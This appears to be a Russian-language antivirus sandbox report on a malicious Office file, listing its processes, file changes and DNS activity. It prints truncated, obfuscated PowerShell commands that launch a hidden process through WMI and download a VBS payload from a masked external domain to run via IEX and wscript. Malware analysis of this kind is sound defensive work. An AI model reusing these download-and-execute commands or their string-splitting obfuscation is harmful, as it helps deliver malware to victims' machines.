Техническая информация
Вредоносные функции
Запускает на исполнение (эксплоит)
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' $Computer = '.';$c = [WMICLASS]"""\\$computer\root\cimv2:WIn32_Process""";$f =[WMICLASS]"""\\$computer\root\cimv2:Win32_ProcessStartup""";$ty =$f.CreateInstance();$ty.ShowWindow = 0;$proc = $c....
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' '(&'+'(G'+'C'+'M'+' *W-'+'O*)'+ 'Ne'+'t.'+'Web'+'Cli'+'ent)'+'.Dow'+'nl'+'oad'+'Fil'+'e(''http://of#######eaner-commanders.com/doug.vbs'',''%APPDATA%''+''\archive.vbs'')'|IEX; start-process('%A...
- '<SYSTEM32>\wscript.exe' "%APPDATA%\archive.vbs"
Изменения в файловой системе
Создает следующие файлы
- %LOCALAPPDATA%\microsoft\windows\<INETFILES>\content.word\~wrf{dd5c5ecd-773d-426f-ba35-82afc48d3ca0}.tmp
Сетевая активность
UDP
- DNS ASK of#######eaner-commanders.com
Другое
Создает и запускает на исполнение
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' '(&'+'(G'+'C'+'M'+' *W-'+'O*)'+ 'Ne'+'t.'+'Web'+'Cli'+'ent)'+'.Dow'+'nl'+'oad'+'Fil'+'e(''http://of#######eaner-commanders.com/doug.vbs'',''%APPDATA%''+''\archive.vbs'')'|IEX; start-process('%A...' (со скрытым окном)
Запускает на исполнение
- '%ProgramFiles%\microsoft office\office14\excel.exe' -Embedding
- '<SYSTEM32>\cmd.exe' /c start /min powershell $Computer = '.';$c = [WMICLASS]"""\\$computer\root\cimv2:WIn32_Process""";$f =[WMICLASS]"""\\$computer\root\cimv2:Win32_ProcessStartup""";$ty =$f.CreateInstance();$ty.S...
- '%ProgramFiles%\microsoft office\office14\excelcnv.exe' -Embedding
